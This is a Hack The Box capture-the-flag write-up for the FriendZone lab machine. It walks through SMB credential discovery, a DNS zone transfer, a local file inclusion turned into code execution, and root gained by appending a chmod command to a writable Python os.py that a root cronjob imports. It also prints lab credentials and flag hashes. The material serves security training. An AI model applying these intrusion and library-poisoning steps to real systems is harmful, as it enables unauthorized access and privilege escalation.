Hack The Box: FriendZone machine write-up
Although this machine was rated as easy with 20 points, I found it really challenging and learnt a great deal in some aspects, like DNS. It starts with us checking smb, getting some credentials and then having to do a zone transfer in order to find an admin panel, after which we come across an LFI which leads to RCE. Then, it’s just a matter of realising that there is a cronjob running a python script as root which imports the “"”os””” library, so we can poison it and hence get to root.
The machine runs with ip 10.10.10.123.
Enumeration
First, I enumerate open ports to discover the services running in the machine:
1
nmap -sV -sC -oA nmap/initial 10.10.10.123
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# Nmap 7.70 scan initiated Thu Feb 14 08:48:29 2019 as: nmap -sV -sC -oA nmap/initial friendzone
Nmap scan report for friendzone (10.10.10.123)
Host is up (0.041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-02-14T10:48:46+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-02-14 08:48:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 14 08:49:30 2019 -- 1 IP address (1 host up) scanned in 61.70 seconds
So many things, so let’s go one by one.
SMB server
I connected anonymously to the samba shares and discovered some interesting credentials. For that, I used SMBMap, a useful tool which lets the user scan all shares, list them recursively and even download files:
I tried to use the credentials in FTP and SSH, but no luck. Therefore, I decided to move on to the webserver on port 80.
Web server on port 80
The main page looked like this:
I tried to run dirbuster and came across what was a rabbit hole: a directory called wordpress that was empty. I tried to have a look at port 445, but nothing came up. It was time to enumerate port 53!
DNS enumeration
I was completely new to this so I was advised to watch Ippsec’s video of Bank (kudos to him). It indeed turned out to be useful, as the technique was the same: Zone Transfer. What this attack does is the following: the attacker acts as if it were a slave DNS server and asks the server for DNS entries, to which the compromised server complies. Hence, the attacker gets a bunch of useful information data.
The command I used was:
1
dig axfr @10.10.10.123 friendzone.red
I used that domain because in the main page there was an email with domain friendzoneportal.red and, after trying with that and getting nothing I removed the portal substring.
We can see some interesting domains, amongst which there is one that contains administrator! I added all of them to my /etc/hosts file.
Web server on port 445
After adding all the entries, I visited https://administrator1.friendzone.red/.
I entered the creds obtained through SMB: admin:WORKWORKHhallelujah@#.
After some enumeration with dirbuster I dsicovered a PHP script called timestamp in that directory, so that gave me a clue of what was really happening: the pagename parameter includes a PHP script, in this case timestamp.php.
Getting user
With that in mind, it’s easy to guess what to do: I just need to upload a PHP script to SMB (Development share) and then try to include it in the pagename parameter. Simple, isn’t it?
Well, it didn’t turn out to be that easy, as I couldn’t find the path of Development… After quite a lot of time, someone gave me a hint and told me to look at /etc/. And there is was! I made a simple PHP file called test.php and uploaded to Development. The contents of the file were:
1
<?php echo "YESSSSS";?>
Then I accessed it with /etc/Development/test as the pagename parameter.
Okay, so now I just needed to upload a shell and listen with netcat!
And we get the user hash being www-data: a9ed20acecd6c5b6b52f474e15ae9a11.
Getting root
I started to enumerate the system and came across two interesting facts:
- There is a python script in
/opt/server-status/reporter.py:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
- The
/usr/lib/python2.7/os.pyfile could be edited!
I then used pspy, a tool to monitor processes without the need of root privileges and got the following cronjob:
Okay, so we have a python script that runs as root in a cronjob, and this script import os, which we can write. Seems obvious right? It’s only necessary to poison the library by modifying the source code of /usr/lib/python2.7/os.py.
I run the following command:
1
echo "system('chmod 777 -R /root')" >> /usr/lib/python2.7/os.py
I waited and voilà! I could now access the root directory and read the flag:
And finally we can do cat root.txt:
1
b0e6c60b82cf96e9855ac1656a9e90c7
Definitely one of the most interesting and learning-wise machines I’ve ever rooted! I hope you learnt as well reading the write-up!